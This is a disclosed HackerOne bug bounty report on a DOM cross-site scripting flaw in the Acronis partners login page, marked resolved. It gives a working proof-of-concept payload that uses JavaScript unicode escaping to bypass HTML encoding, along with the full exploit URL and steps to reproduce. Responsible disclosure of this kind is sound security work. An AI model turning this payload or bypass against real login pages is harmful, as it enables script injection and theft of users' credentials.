XSS on https://partners.acronis.com/

Disclosed: 2021-06-17 01:28:32 By yash_ To acronis
Low
Vulnerability Details
Hello, I found DOM XSS on login page of https://partners.acronis.com/ Open this URL https://partners.acronis.com/en-us/profile/login.html?-back=test123"> and search for `var back =`. Here input is HTML encoded but from that reflected value, element is created and appended to the form. {F983552} We can use JavaScript's unicode escaping to bypass this.. ## Steps To Reproduce 1. For this payload `"><img src=x onerror=alert(1)><x y="` we have to replace `"` with `\u0022`, `>` with `\u003e` and `<` with `\u003c`. So the payload will be `\u0022\u003e\u003cimg src=x onerror=alert(1)\u003e\u003cx y=\u0022` 1. Open this URL ``` https://partners.acronis.com/en-us/profile/login.html?-back=\u0022\u003e\u003cimg+src=x+onerror=alert(1)\u003e\u003cx+y=\u0022 ``` 1. And you'll see alert dialog. {F983553} ## Impact Attacker can execute JavaScript code on users who open the link. This XSS is in the login page so it can be used to get someone's credentials..
Actions
View on HackerOne
Report Stats
  • Report ID: 979204
  • State: Closed
  • Substate: resolved
  • Upvotes: 72
Share this report